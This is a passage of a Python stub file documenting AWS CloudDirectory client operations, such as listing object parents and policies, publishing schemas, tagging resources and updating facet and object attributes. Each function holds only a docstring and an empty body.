def list_object_parent_paths(DirectoryArn=None, ObjectReference=None, NextToken=None, MaxResults=None):
    """
    Retrieves all available parent paths for any object type such as node, leaf
    node, policy node, and index node objects.

    Use this API to evaluate all parents for an object. The call returns all
    objects from the root of the directory up to the requested object. The API
    returns the number of paths based on user-defined MaxResults, in case there
    are multiple paths to the parent. The order of the paths and nodes returned
    is consistent among multiple API calls unless the objects are deleted or
    moved. Paths not leading to the directory root are ignored from the target
    object.

    See also: AWS API Documentation.

    :type DirectoryArn: string
    :param DirectoryArn: [REQUIRED] The ARN of the directory to which the parent
        path applies.
    :type ObjectReference: dict
    :param ObjectReference: [REQUIRED] The reference that identifies the object
        whose parent paths are listed, as ``{'Selector': 'string'}``. A selector
        can be an object identifier (``$ObjectIdentifier``), a path
        (``/some/path``), or a batch reference (``#SomeBatchReference``).
    :type NextToken: string
    :param NextToken: The pagination token.
    :type MaxResults: integer
    :param MaxResults: The maximum number of items to be retrieved in a single
        call. This is an approximate number.
    :rtype: dict
    :return: A dict of the form::

        {
            'PathToObjectIdentifiersList': [
                {
                    'Path': 'string',
                    'ObjectIdentifiers': [
                        'string',
                    ]
                },
            ],
            'NextToken': 'string'
        }

        Each entry gives the path used to identify the object starting from the
        directory root, plus the ObjectIdentifiers from the root to the object
        in the request.

    Raises ``CloudDirectory.Client.exceptions``: InternalServiceException,
    InvalidArnException, RetryableConflictException, ValidationException,
    LimitExceededException, AccessDeniedException, DirectoryNotEnabledException,
    InvalidNextTokenException, ResourceNotFoundException.
    """
    # Auto-generated documentation stub; the real call is dispatched by botocore.
    return None
def list_object_parents(DirectoryArn=None, ObjectReference=None, NextToken=None, MaxResults=None, ConsistencyLevel=None, IncludeAllLinksToEachParent=None):
    """
    Lists parent objects that are associated with a given object in pagination
    fashion.

    See also: AWS API Documentation.

    :type DirectoryArn: string
    :param DirectoryArn: [REQUIRED] The Amazon Resource Name (ARN) that is
        associated with the Directory where the object resides.
    :type ObjectReference: dict
    :param ObjectReference: [REQUIRED] The reference that identifies the object
        for which parent objects are being listed, as ``{'Selector': 'string'}``.
        A selector can be an object identifier (``$ObjectIdentifier``), a path
        (``/some/path``), or a batch reference (``#SomeBatchReference``).
    :type NextToken: string
    :param NextToken: The pagination token.
    :type MaxResults: integer
    :param MaxResults: The maximum number of items to be retrieved in a single
        call. This is an approximate number.
    :type ConsistencyLevel: string
    :param ConsistencyLevel: Represents the manner and timing in which the
        successful write or update of an object is reflected in a subsequent read
        operation of that same object (``'SERIALIZABLE'`` or ``'EVENTUAL'``).
    :type IncludeAllLinksToEachParent: boolean
    :param IncludeAllLinksToEachParent: When set to True, returns all
        ListObjectParentsResponse$ParentLinks. There could be multiple links
        between a parent-child pair.
    :rtype: dict
    :return: A dict of the form::

        {
            'Parents': {
                'string': 'string'
            },
            'NextToken': 'string',
            'ParentLinks': [
                {
                    'ObjectIdentifier': 'string',
                    'LinkName': 'string'
                },
            ]
        }

        ``Parents`` is a map with the ObjectIdentifier as key and the LinkName as
        value. ``ParentLinks`` is a list of (ObjectIdentifier, LinkName) pairs
        where LinkName names the link between the parent and the child object.

    Raises ``CloudDirectory.Client.exceptions``: InternalServiceException,
    InvalidArnException, RetryableConflictException, ValidationException,
    LimitExceededException, AccessDeniedException, DirectoryNotEnabledException,
    ResourceNotFoundException, InvalidNextTokenException,
    CannotListParentOfRootException.
    """
    # Auto-generated documentation stub; the real call is dispatched by botocore.
    return None
def list_object_policies(DirectoryArn=None, ObjectReference=None, NextToken=None, MaxResults=None, ConsistencyLevel=None):
    """
    Returns policies attached to an object in pagination fashion.

    See also: AWS API Documentation.

    :type DirectoryArn: string
    :param DirectoryArn: [REQUIRED] The Amazon Resource Name (ARN) that is
        associated with the Directory where objects reside.
    :type ObjectReference: dict
    :param ObjectReference: [REQUIRED] Reference that identifies the object for
        which policies will be listed, as ``{'Selector': 'string'}``. A selector
        can be an object identifier (``$ObjectIdentifier``), a path
        (``/some/path``), or a batch reference (``#SomeBatchReference``).
    :type NextToken: string
    :param NextToken: The pagination token.
    :type MaxResults: integer
    :param MaxResults: The maximum number of items to be retrieved in a single
        call. This is an approximate number.
    :type ConsistencyLevel: string
    :param ConsistencyLevel: Represents the manner and timing in which the
        successful write or update of an object is reflected in a subsequent read
        operation of that same object (``'SERIALIZABLE'`` or ``'EVENTUAL'``).
    :rtype: dict
    :return: A dict of the form::

        {
            'AttachedPolicyIds': [
                'string',
            ],
            'NextToken': 'string'
        }

        ``AttachedPolicyIds`` is a list of policy ObjectIdentifiers that are
        attached to the object.

    Raises ``CloudDirectory.Client.exceptions``: InternalServiceException,
    InvalidArnException, RetryableConflictException, ValidationException,
    LimitExceededException, AccessDeniedException, DirectoryNotEnabledException,
    ResourceNotFoundException, InvalidNextTokenException.
    """
    # Auto-generated documentation stub; the real call is dispatched by botocore.
    return None
def list_outgoing_typed_links(DirectoryArn=None, ObjectReference=None, FilterAttributeRanges=None, FilterTypedLink=None, NextToken=None, MaxResults=None, ConsistencyLevel=None):
    """Return a paginated list of all outgoing TypedLinkSpecifier information for an object.

    Also supports filtering by typed link facet and identity attributes.
    See also: AWS API Documentation.

    :type DirectoryArn: string
    :param DirectoryArn: [REQUIRED] The Amazon Resource Name (ARN) of the
        directory where you want to list the typed links.
    :type ObjectReference: dict
    :param ObjectReference: [REQUIRED] A reference that identifies the object
        whose attributes will be listed. Contains a ``Selector`` string that
        identifies the object by object identifier (``$ObjectIdentifier``),
        by path (``/some/path``), or by batch reference
        (``#SomeBatchReference``).
    :type FilterAttributeRanges: list
    :param FilterAttributeRanges: Range filters for multiple attributes. Any
        inexact ranges must be specified at the end; attributes without a
        range are presumed to match the entire range. Each item is a dict
        with ``AttributeName`` and a ``Range`` dict (``StartMode``,
        ``StartValue``, ``EndMode``, ``EndValue``).
    :type FilterTypedLink: dict
    :param FilterTypedLink: Filters, interpreted in the order of the
        attributes defined on the typed link facet (not the order supplied to
        the call). Contains ``SchemaArn`` [REQUIRED] and ``TypedLinkName``
        [REQUIRED].
    :type NextToken: string
    :param NextToken: The pagination token.
    :type MaxResults: integer
    :param MaxResults: The maximum number of results to retrieve.
    :type ConsistencyLevel: string
    :param ConsistencyLevel: The consistency level to execute the request at
        ('SERIALIZABLE' | 'EVENTUAL').
    :rtype: dict
    :return: A dict with ``TypedLinkSpecifiers`` — a list of typed link
        specifiers, each containing ``TypedLinkFacet`` (``SchemaArn``,
        ``TypedLinkName``), ``SourceObjectReference``,
        ``TargetObjectReference`` and ``IdentityAttributeValues`` — plus a
        ``NextToken`` pagination token.

    Raises: InternalServiceException, InvalidArnException,
    RetryableConflictException, ValidationException, LimitExceededException,
    AccessDeniedException, DirectoryNotEnabledException,
    ResourceNotFoundException, InvalidNextTokenException,
    FacetValidationException.
    """
    pass
def list_policy_attachments(DirectoryArn=None, PolicyReference=None, NextToken=None, MaxResults=None, ConsistencyLevel=None):
    """Return all of the ObjectIdentifiers to which a given policy is attached.

    See also: AWS API Documentation.

    :type DirectoryArn: string
    :param DirectoryArn: [REQUIRED] The ARN that is associated with the
        Directory where objects reside. For more information, see arns.
    :type PolicyReference: dict
    :param PolicyReference: [REQUIRED] The reference that identifies the
        policy object. Contains a ``Selector`` string identifying the object
        by ``$ObjectIdentifier``, path, or ``#BatchReference``.
    :type NextToken: string
    :param NextToken: The pagination token.
    :type MaxResults: integer
    :param MaxResults: The maximum number of items to be retrieved in a
        single call. This is an approximate number.
    :type ConsistencyLevel: string
    :param ConsistencyLevel: Represents the manner and timing in which the
        successful write or update of an object is reflected in a subsequent
        read operation of that same object.
    :rtype: dict
    :return: A dict with ``ObjectIdentifiers`` (list of strings to which the
        policy is attached) and ``NextToken``.

    Raises: InternalServiceException, InvalidArnException,
    RetryableConflictException, ValidationException, LimitExceededException,
    AccessDeniedException, DirectoryNotEnabledException,
    InvalidNextTokenException, ResourceNotFoundException, NotPolicyException.
    """
    pass
def list_published_schema_arns(SchemaArn=None, NextToken=None, MaxResults=None):
    """List the major version families of each published schema.

    If a major version ARN is provided as ``SchemaArn``, the minor version
    revisions in that family are listed instead.
    See also: AWS API Documentation.

    :type SchemaArn: string
    :param SchemaArn: When this parameter is used, the response lists all
        minor version ARNs for a major version.
    :type NextToken: string
    :param NextToken: The pagination token.
    :type MaxResults: integer
    :param MaxResults: The maximum number of results to retrieve.
    :rtype: dict
    :return: A dict with ``SchemaArns`` (list of published schema ARN
        strings) and ``NextToken``.

    Raises: InternalServiceException, InvalidArnException,
    RetryableConflictException, ValidationException, LimitExceededException,
    AccessDeniedException, ResourceNotFoundException,
    InvalidNextTokenException.
    """
    pass
def list_tags_for_resource(ResourceArn=None, NextToken=None, MaxResults=None):
    """Return tags for a resource.

    Tagging is currently supported only for directories, with a limit of 50
    tags per directory; all 50 tags are returned for a given directory with
    this API call.
    See also: AWS API Documentation.

    :type ResourceArn: string
    :param ResourceArn: [REQUIRED] The ARN of the resource. Tagging is only
        supported for directories.
    :type NextToken: string
    :param NextToken: The pagination token. This is for future use; currently
        pagination is not supported for tagging.
    :type MaxResults: integer
    :param MaxResults: Sets the maximum number of results returned in a
        single page. This is for future use and is not supported currently.
    :rtype: dict
    :return: A dict with ``Tags`` — a list of ``{'Key': str, 'Value': str}``
        pairs associated with the resource — and ``NextToken``, which is
        null when there are no more results to return.

    Raises: InternalServiceException, InvalidArnException,
    RetryableConflictException, ValidationException, LimitExceededException,
    AccessDeniedException, ResourceNotFoundException,
    InvalidTaggingRequestException.
    """
    pass
def list_typed_link_facet_attributes(SchemaArn=None, Name=None, NextToken=None, MaxResults=None):
    """Return a paginated list of all attribute definitions for a particular TypedLinkFacet.

    For more information, see Typed Links.
    See also: AWS API Documentation.

    :type SchemaArn: string
    :param SchemaArn: [REQUIRED] The ARN that is associated with the schema.
        For more information, see arns.
    :type Name: string
    :param Name: [REQUIRED] The unique name of the typed link facet.
    :type NextToken: string
    :param NextToken: The pagination token.
    :type MaxResults: integer
    :param MaxResults: The maximum number of results to retrieve.
    :rtype: dict
    :return: A dict with ``Attributes`` — an ordered list of typed link
        attribute definitions, each containing ``Name``, ``Type``
        ('STRING' | 'BINARY' | 'BOOLEAN' | 'NUMBER' | 'DATETIME' |
        'VARIANT'), ``DefaultValue``, ``IsImmutable``, ``Rules``
        (validation rules keyed by name, each with ``Type`` and
        ``Parameters``), and ``RequiredBehavior``
        ('REQUIRED_ALWAYS' | 'NOT_REQUIRED') — plus ``NextToken``.

    Raises: InternalServiceException, InvalidArnException,
    RetryableConflictException, ValidationException, LimitExceededException,
    AccessDeniedException, ResourceNotFoundException,
    FacetNotFoundException, InvalidNextTokenException.
    """
    pass
def list_typed_link_facet_names(SchemaArn=None, NextToken=None, MaxResults=None):
    """Return a paginated list of TypedLink facet names for a particular schema.

    For more information, see Typed Links.
    See also: AWS API Documentation.

    :type SchemaArn: string
    :param SchemaArn: [REQUIRED] The ARN that is associated with the schema.
        For more information, see arns.
    :type NextToken: string
    :param NextToken: The pagination token.
    :type MaxResults: integer
    :param MaxResults: The maximum number of results to retrieve.
    :rtype: dict
    :return: A dict with ``FacetNames`` (names of typed link facets that
        exist within the schema) and ``NextToken``.

    Raises: InternalServiceException, InvalidArnException,
    RetryableConflictException, ValidationException, LimitExceededException,
    AccessDeniedException, ResourceNotFoundException,
    InvalidNextTokenException.
    """
    pass
def lookup_policy(DirectoryArn=None, ObjectReference=None, NextToken=None, MaxResults=None):
    """List all policies from the root of the Directory to the specified object.

    If there are no policies present, an empty list is returned. If policies
    are present and some objects don't have policies attached, the
    ObjectIdentifier for such objects is returned. If policies are present,
    ObjectIdentifier, policyId, and policyType are returned. Paths that
    don't lead to the root from the target object are ignored. For more
    information, see Policies.
    See also: AWS API Documentation.

    :type DirectoryArn: string
    :param DirectoryArn: [REQUIRED] The ARN that is associated with the
        Directory. For more information, see arns.
    :type ObjectReference: dict
    :param ObjectReference: [REQUIRED] Reference that identifies the object
        whose policies will be looked up. Contains a ``Selector`` string
        identifying the object by ``$ObjectIdentifier``, path, or
        ``#BatchReference``.
    :type NextToken: string
    :param NextToken: The token to request the next page of results.
    :type MaxResults: integer
    :param MaxResults: The maximum number of items to be retrieved in a
        single call. This is an approximate number.
    :rtype: dict
    :return: A dict with ``PolicyToPathList`` — a list of entries mapping a
        ``Path`` (referenced from the root) to ``Policies``, each policy
        containing ``PolicyId``, ``ObjectIdentifier``, and ``PolicyType`` —
        plus ``NextToken``.

    Raises: InternalServiceException, InvalidArnException,
    RetryableConflictException, ValidationException, LimitExceededException,
    AccessDeniedException, DirectoryNotEnabledException,
    InvalidNextTokenException, ResourceNotFoundException.
    """
    pass
def publish_schema(DevelopmentSchemaArn=None, Version=None, MinorVersion=None, Name=None):
    """Publish a development schema with a major version and a recommended minor version.

    See also: AWS API Documentation.

    :type DevelopmentSchemaArn: string
    :param DevelopmentSchemaArn: [REQUIRED] The ARN that is associated with
        the development schema. For more information, see arns.
    :type Version: string
    :param Version: [REQUIRED] The major version under which the schema will
        be published. Schemas have both a major and minor version associated
        with them.
    :type MinorVersion: string
    :param MinorVersion: The minor version under which the schema will be
        published. This parameter is recommended.
    :type Name: string
    :param Name: The new name under which the schema will be published. If
        not provided, the development schema is considered.
    :rtype: dict
    :return: A dict with ``PublishedSchemaArn`` — the ARN associated with
        the published schema.

    Raises: InternalServiceException, InvalidArnException,
    RetryableConflictException, ValidationException, LimitExceededException,
    AccessDeniedException, ResourceNotFoundException,
    SchemaAlreadyPublishedException.
    """
    pass
def put_schema_from_json(SchemaArn=None, Document=None):
    """Allow a schema to be updated using JSON upload.

    Only available for development schemas. See JSON Schema Format for more
    information.
    See also: AWS API Documentation.

    :type SchemaArn: string
    :param SchemaArn: [REQUIRED] The ARN of the schema to update.
    :type Document: string
    :param Document: [REQUIRED] The replacement JSON schema.
    :rtype: dict
    :return: A dict with ``Arn`` — the ARN of the schema to update.

    Raises: InternalServiceException, InvalidArnException,
    RetryableConflictException, ValidationException, LimitExceededException,
    AccessDeniedException, InvalidSchemaDocException, InvalidRuleException.
    """
    pass
def remove_facet_from_object(DirectoryArn=None, SchemaFacet=None, ObjectReference=None):
    """Remove the specified facet from the specified object.

    See also: AWS API Documentation.

    :type DirectoryArn: string
    :param DirectoryArn: [REQUIRED] The ARN of the directory in which the
        object resides.
    :type SchemaFacet: dict
    :param SchemaFacet: [REQUIRED] The facet to remove. Contains
        ``SchemaArn`` (the ARN of the schema that contains the facet, with
        no minor component) and ``FacetName``. See arns and In-Place Schema
        Upgrade for when to provide minor versions.
    :type ObjectReference: dict
    :param ObjectReference: [REQUIRED] A reference to the object to remove
        the facet from. Contains a ``Selector`` string identifying the
        object by ``$ObjectIdentifier``, path, or ``#BatchReference``.
    :rtype: dict
    :return: An empty dict on success.

    Raises: InternalServiceException, InvalidArnException,
    RetryableConflictException, ValidationException, LimitExceededException,
    AccessDeniedException, DirectoryNotEnabledException,
    ResourceNotFoundException, FacetValidationException.
    """
    pass
def tag_resource(ResourceArn=None, Tags=None):
"""
An API operation for adding tags to a resource.
See also: AWS API Documentation
Exceptions
:example: response = client.tag_resource(
ResourceArn='string',
Tags=[
{
'Key': 'string',
'Value': 'string'
},
]
)
:type ResourceArn: string
:param ResourceArn: [REQUIRED]\nThe Amazon Resource Name (ARN) of the resource. Tagging is only supported for directories.\n
:type Tags: list
:param Tags: [REQUIRED]\nA list of tag key-value pairs.\n\n(dict) --The tag structure that contains a tag key and value.\n\nKey (string) --The key that is associated with the tag.\n\nValue (string) --The value that is associated with the tag.\n\n\n\n\n
:rtype: dict
ReturnsResponse Syntax
{}
Response Structure
(dict) --
Exceptions
CloudDirectory.Client.exceptions.InternalServiceException
CloudDirectory.Client.exceptions.InvalidArnException
CloudDirectory.Client.exceptions.RetryableConflictException
CloudDirectory.Client.exceptions.ValidationException
CloudDirectory.Client.exceptions.LimitExceededException
CloudDirectory.Client.exceptions.AccessDeniedException
CloudDirectory.Client.exceptions.ResourceNotFoundException
CloudDirectory.Client.exceptions.InvalidTaggingRequestException
:return: {}
:returns:
(dict) --
"""
pass
def untag_resource(ResourceArn=None, TagKeys=None):
"""
An API operation for removing tags from a resource.
See also: AWS API Documentation
Exceptions
:example: response = client.untag_resource(
ResourceArn='string',
TagKeys=[
'string',
]
)
:type ResourceArn: string
:param ResourceArn: [REQUIRED]\nThe Amazon Resource Name (ARN) of the resource. Tagging is only supported for directories.\n
:type TagKeys: list
:param TagKeys: [REQUIRED]\nKeys of the tag that need to be removed from the resource.\n\n(string) --\n\n
:rtype: dict
ReturnsResponse Syntax
{}
Response Structure
(dict) --
Exceptions
CloudDirectory.Client.exceptions.InternalServiceException
CloudDirectory.Client.exceptions.InvalidArnException
CloudDirectory.Client.exceptions.RetryableConflictException
CloudDirectory.Client.exceptions.ValidationException
CloudDirectory.Client.exceptions.LimitExceededException
CloudDirectory.Client.exceptions.AccessDeniedException
CloudDirectory.Client.exceptions.ResourceNotFoundException
CloudDirectory.Client.exceptions.InvalidTaggingRequestException
:return: {}
:returns:
(dict) --
"""
pass
def update_facet(SchemaArn=None, Name=None, AttributeUpdates=None, ObjectType=None):
"""
Does the following:
See also: AWS API Documentation
Exceptions
:example: response = client.update_facet(
SchemaArn='string',
Name='string',
AttributeUpdates=[
{
'Attribute': {
'Name': 'string',
'AttributeDefinition': {
'Type': 'STRING'|'BINARY'|'BOOLEAN'|'NUMBER'|'DATETIME'|'VARIANT',
'DefaultValue': {
'StringValue': 'string',
'BinaryValue': b'bytes',
'BooleanValue': True|False,
'NumberValue': 'string',
'DatetimeValue': datetime(2015, 1, 1)
},
'IsImmutable': True|False,
'Rules': {
'string': {
'Type': 'BINARY_LENGTH'|'NUMBER_COMPARISON'|'STRING_FROM_SET'|'STRING_LENGTH',
'Parameters': {
'string': 'string'
}
}
}
},
'AttributeReference': {
'TargetFacetName': 'string',
'TargetAttributeName': 'string'
},
'RequiredBehavior': 'REQUIRED_ALWAYS'|'NOT_REQUIRED'
},
'Action': 'CREATE_OR_UPDATE'|'DELETE'
},
],
ObjectType='NODE'|'LEAF_NODE'|'POLICY'|'INDEX'
)
:type SchemaArn: string
:param SchemaArn: [REQUIRED]\nThe Amazon Resource Name (ARN) that is associated with the Facet . For more information, see arns .\n
:type Name: string
:param Name: [REQUIRED]\nThe name of the facet.\n
:type AttributeUpdates: list
:param AttributeUpdates: List of attributes that need to be updated in a given schema Facet . Each attribute is followed by AttributeAction , which specifies the type of update operation to perform.\n\n(dict) --A structure that contains information used to update an attribute.\n\nAttribute (dict) --The attribute to update.\n\nName (string) -- [REQUIRED]The name of the facet attribute.\n\nAttributeDefinition (dict) --A facet attribute consists of either a definition or a reference. This structure contains the attribute definition. See Attribute References for more information.\n\nType (string) -- [REQUIRED]The type of the attribute.\n\nDefaultValue (dict) --The default value of the attribute (if configured).\n\nStringValue (string) --A string data value.\n\nBinaryValue (bytes) --A binary data value.\n\nBooleanValue (boolean) --A Boolean data value.\n\nNumberValue (string) --A number data value.\n\nDatetimeValue (datetime) --A date and time value.\n\n\n\nIsImmutable (boolean) --Whether the attribute is mutable or not.\n\nRules (dict) --Validation rules attached to the attribute definition.\n\n(string) --\n(dict) --Contains an Amazon Resource Name (ARN) and parameters that are associated with the rule.\n\nType (string) --The type of attribute validation rule.\n\nParameters (dict) --The minimum and maximum parameters that are associated with the rule.\n\n(string) --\n(string) --\n\n\n\n\n\n\n\n\n\n\n\n\nAttributeReference (dict) --An attribute reference that is associated with the attribute. See Attribute References for more information.\n\nTargetFacetName (string) -- [REQUIRED]The target facet name that is associated with the facet reference. See Attribute References for more information.\n\nTargetAttributeName (string) -- [REQUIRED]The target attribute name that is associated with the facet reference. 
See Attribute References for more information.\n\n\n\nRequiredBehavior (string) --The required behavior of the FacetAttribute .\n\n\n\nAction (string) --The action to perform when updating the attribute.\n\n\n\n\n
:type ObjectType: string
:param ObjectType: The object type that is associated with the facet. See CreateFacetRequest$ObjectType for more details.
:rtype: dict
ReturnsResponse Syntax
{}
Response Structure
(dict) --
Exceptions
CloudDirectory.Client.exceptions.InternalServiceException
CloudDirectory.Client.exceptions.InvalidArnException
CloudDirectory.Client.exceptions.RetryableConflictException
CloudDirectory.Client.exceptions.ValidationException
CloudDirectory.Client.exceptions.LimitExceededException
CloudDirectory.Client.exceptions.AccessDeniedException
CloudDirectory.Client.exceptions.InvalidFacetUpdateException
CloudDirectory.Client.exceptions.FacetValidationException
CloudDirectory.Client.exceptions.ResourceNotFoundException
CloudDirectory.Client.exceptions.FacetNotFoundException
CloudDirectory.Client.exceptions.InvalidRuleException
:return: {}
:returns:
SchemaArn (string) -- [REQUIRED]
The Amazon Resource Name (ARN) that is associated with the Facet . For more information, see arns .
Name (string) -- [REQUIRED]
The name of the facet.
AttributeUpdates (list) -- List of attributes that need to be updated in a given schema Facet . Each attribute is followed by AttributeAction , which specifies the type of update operation to perform.
(dict) --A structure that contains information used to update an attribute.
Attribute (dict) --The attribute to update.
Name (string) -- [REQUIRED]The name of the facet attribute.
AttributeDefinition (dict) --A facet attribute consists of either a definition or a reference. This structure contains the attribute definition. See Attribute References for more information.
Type (string) -- [REQUIRED]The type of the attribute.
DefaultValue (dict) --The default value of the attribute (if configured).
StringValue (string) --A string data value.
BinaryValue (bytes) --A binary data value.
BooleanValue (boolean) --A Boolean data value.
NumberValue (string) --A number data value.
DatetimeValue (datetime) --A date and time value.
IsImmutable (boolean) --Whether the attribute is mutable or not.
Rules (dict) --Validation rules attached to the attribute definition.
(string) --
(dict) --Contains an Amazon Resource Name (ARN) and parameters that are associated with the rule.
Type (string) --The type of attribute validation rule.
Parameters (dict) --The minimum and maximum parameters that are associated with the rule.
(string) --
(string) --
AttributeReference (dict) --An attribute reference that is associated with the attribute. See Attribute References for more information.
TargetFacetName (string) -- [REQUIRED]The target facet name that is associated with the facet reference. See Attribute References for more information.
TargetAttributeName (string) -- [REQUIRED]The target attribute name that is associated with the facet reference. See Attribute References for more information.
RequiredBehavior (string) --The required behavior of the FacetAttribute .
Action (string) --The action to perform when updating the attribute.
ObjectType (string) -- The object type that is associated with the facet. See CreateFacetRequest$ObjectType for more details.
"""
pass
def update_link_attributes(DirectoryArn=None, TypedLinkSpecifier=None, AttributeUpdates=None):
"""
Updates a given typed link\xe2\x80\x99s attributes. Attributes to be updated must not contribute to the typed link\xe2\x80\x99s identity, as defined by its IdentityAttributeOrder .
See also: AWS API Documentation
Exceptions
:example: response = client.update_link_attributes(
DirectoryArn='string',
TypedLinkSpecifier={
'TypedLinkFacet': {
'SchemaArn': 'string',
'TypedLinkName': 'string'
},
'SourceObjectReference': {
'Selector': 'string'
},
'TargetObjectReference': {
'Selector': 'string'
},
'IdentityAttributeValues': [
{
'AttributeName': 'string',
'Value': {
'StringValue': 'string',
'BinaryValue': b'bytes',
'BooleanValue': True|False,
'NumberValue': 'string',
'DatetimeValue': datetime(2015, 1, 1)
}
},
]
},
AttributeUpdates=[
{
'AttributeKey': {
'SchemaArn': 'string',
'FacetName': 'string',
'Name': 'string'
},
'AttributeAction': {
'AttributeActionType': 'CREATE_OR_UPDATE'|'DELETE',
'AttributeUpdateValue': {
'StringValue': 'string',
'BinaryValue': b'bytes',
'BooleanValue': True|False,
'NumberValue': 'string',
'DatetimeValue': datetime(2015, 1, 1)
}
}
},
]
)
:type DirectoryArn: string
:param DirectoryArn: [REQUIRED]\nThe Amazon Resource Name (ARN) that is associated with the Directory where the updated typed link resides. For more information, see arns or Typed Links .\n
:type TypedLinkSpecifier: dict
:param TypedLinkSpecifier: [REQUIRED]\nAllows a typed link specifier to be accepted as input.\n\nTypedLinkFacet (dict) -- [REQUIRED]Identifies the typed link facet that is associated with the typed link.\n\nSchemaArn (string) -- [REQUIRED]The Amazon Resource Name (ARN) that is associated with the schema. For more information, see arns .\n\nTypedLinkName (string) -- [REQUIRED]The unique name of the typed link facet.\n\n\n\nSourceObjectReference (dict) -- [REQUIRED]Identifies the source object that the typed link will attach to.\n\nSelector (string) --A path selector supports easy selection of an object by the parent/child links leading to it from the directory root. Use the link names from each parent/child link to construct the path. Path selectors start with a slash (/) and link names are separated by slashes. For more information about paths, see Access Objects . You can identify an object in one of the following ways:\n\n$ObjectIdentifier - An object identifier is an opaque string provided by Amazon Cloud Directory. When creating objects, the system will provide you with the identifier of the created object. An object\xe2\x80\x99s identifier is immutable and no two objects will ever share the same object identifier\n/some/path - Identifies the object based on path\n#SomeBatchReference - Identifies the object in a batch call\n\n\n\n\nTargetObjectReference (dict) -- [REQUIRED]Identifies the target object that the typed link will attach to.\n\nSelector (string) --A path selector supports easy selection of an object by the parent/child links leading to it from the directory root. Use the link names from each parent/child link to construct the path. Path selectors start with a slash (/) and link names are separated by slashes. For more information about paths, see Access Objects . You can identify an object in one of the following ways:\n\n$ObjectIdentifier - An object identifier is an opaque string provided by Amazon Cloud Directory. 
When creating objects, the system will provide you with the identifier of the created object. An object\xe2\x80\x99s identifier is immutable and no two objects will ever share the same object identifier\n/some/path - Identifies the object based on path\n#SomeBatchReference - Identifies the object in a batch call\n\n\n\n\nIdentityAttributeValues (list) -- [REQUIRED]Identifies the attribute value to update.\n\n(dict) --Identifies the attribute name and value for a typed link.\n\nAttributeName (string) -- [REQUIRED]The attribute name of the typed link.\n\nValue (dict) -- [REQUIRED]The value for the typed link.\n\nStringValue (string) --A string data value.\n\nBinaryValue (bytes) --A binary data value.\n\nBooleanValue (boolean) --A Boolean data value.\n\nNumberValue (string) --A number data value.\n\nDatetimeValue (datetime) --A date and time value.\n\n\n\n\n\n\n\n\n
:type AttributeUpdates: list
:param AttributeUpdates: [REQUIRED]\nThe attributes update structure.\n\n(dict) --Structure that contains attribute update information.\n\nAttributeKey (dict) --The key of the attribute being updated.\n\nSchemaArn (string) -- [REQUIRED]The Amazon Resource Name (ARN) of the schema that contains the facet and attribute.\n\nFacetName (string) -- [REQUIRED]The name of the facet that the attribute exists within.\n\nName (string) -- [REQUIRED]The name of the attribute.\n\n\n\nAttributeAction (dict) --The action to perform as part of the attribute update.\n\nAttributeActionType (string) --A type that can be either UPDATE_OR_CREATE or DELETE .\n\nAttributeUpdateValue (dict) --The value that you want to update to.\n\nStringValue (string) --A string data value.\n\nBinaryValue (bytes) --A binary data value.\n\nBooleanValue (boolean) --A Boolean data value.\n\nNumberValue (string) --A number data value.\n\nDatetimeValue (datetime) --A date and time value.\n\n\n\n\n\n\n\n\n
:rtype: dict
ReturnsResponse Syntax
{}
Response Structure
(dict) --
Exceptions
CloudDirectory.Client.exceptions.InternalServiceException
CloudDirectory.Client.exceptions.InvalidArnException
CloudDirectory.Client.exceptions.RetryableConflictException
CloudDirectory.Client.exceptions.ValidationException
CloudDirectory.Client.exceptions.LimitExceededException
CloudDirectory.Client.exceptions.AccessDeniedException
CloudDirectory.Client.exceptions.DirectoryNotEnabledException
CloudDirectory.Client.exceptions.ResourceNotFoundException
CloudDirectory.Client.exceptions.FacetValidationException
:return: {}
:returns:
(dict) --
"""
pass
def update_object_attributes(DirectoryArn=None, ObjectReference=None, AttributeUpdates=None):
"""
Updates a given object\'s attributes.
See also: AWS API Documentation
Exceptions
:example: response = client.update_object_attributes(
DirectoryArn='string',
ObjectReference={
'Selector': 'string'
},
AttributeUpdates=[
{
'ObjectAttributeKey': {
'SchemaArn': 'string',
'FacetName': 'string',
'Name': 'string'
},
'ObjectAttributeAction': {
'ObjectAttributeActionType': 'CREATE_OR_UPDATE'|'DELETE',
'ObjectAttributeUpdateValue': {
'StringValue': 'string',
'BinaryValue': b'bytes',
'BooleanValue': True|False,
'NumberValue': 'string',
'DatetimeValue': datetime(2015, 1, 1)
}
}
},
]
)
:type DirectoryArn: string
:param DirectoryArn: [REQUIRED]\nThe Amazon Resource Name (ARN) that is associated with the Directory where the object resides. For more information, see arns .\n
:type ObjectReference: dict
:param ObjectReference: [REQUIRED]\nThe reference that identifies the object.\n\nSelector (string) --A path selector supports easy selection of an object by the parent/child links leading to it from the directory root. Use the link names from each parent/child link to construct the path. Path selectors start with a slash (/) and link names are separated by slashes. For more information about paths, see Access Objects . You can identify an object in one of the following ways:\n\n$ObjectIdentifier - An object identifier is an opaque string provided by Amazon Cloud Directory. When creating objects, the system will provide you with the identifier of the created object. An object\xe2\x80\x99s identifier is immutable and no two objects will ever share the same object identifier\n/some/path - Identifies the object based on path\n#SomeBatchReference - Identifies the object in a batch call\n\n\n\n
:type AttributeUpdates: list
:param AttributeUpdates: [REQUIRED]\nThe attributes update structure.\n\n(dict) --Structure that contains attribute update information.\n\nObjectAttributeKey (dict) --The key of the attribute being updated.\n\nSchemaArn (string) -- [REQUIRED]The Amazon Resource Name (ARN) of the schema that contains the facet and attribute.\n\nFacetName (string) -- [REQUIRED]The name of the facet that the attribute exists within.\n\nName (string) -- [REQUIRED]The name of the attribute.\n\n\n\nObjectAttributeAction (dict) --The action to perform as part of the attribute update.\n\nObjectAttributeActionType (string) --A type that can be either Update or Delete .\n\nObjectAttributeUpdateValue (dict) --The value that you want to update to.\n\nStringValue (string) --A string data value.\n\nBinaryValue (bytes) --A binary data value.\n\nBooleanValue (boolean) --A Boolean data value.\n\nNumberValue (string) --A number data value.\n\nDatetimeValue (datetime) --A date and time value.\n\n\n\n\n\n\n\n\n
:rtype: dict
ReturnsResponse Syntax
{
'ObjectIdentifier': 'string'
}
Response Structure
(dict) --
ObjectIdentifier (string) --
The ObjectIdentifier of the updated object.
Exceptions
CloudDirectory.Client.exceptions.InternalServiceException
CloudDirectory.Client.exceptions.InvalidArnException
CloudDirectory.Client.exceptions.RetryableConflictException
CloudDirectory.Client.exceptions.ValidationException
CloudDirectory.Client.exceptions.LimitExceededException
CloudDirectory.Client.exceptions.AccessDeniedException
CloudDirectory.Client.exceptions.DirectoryNotEnabledException
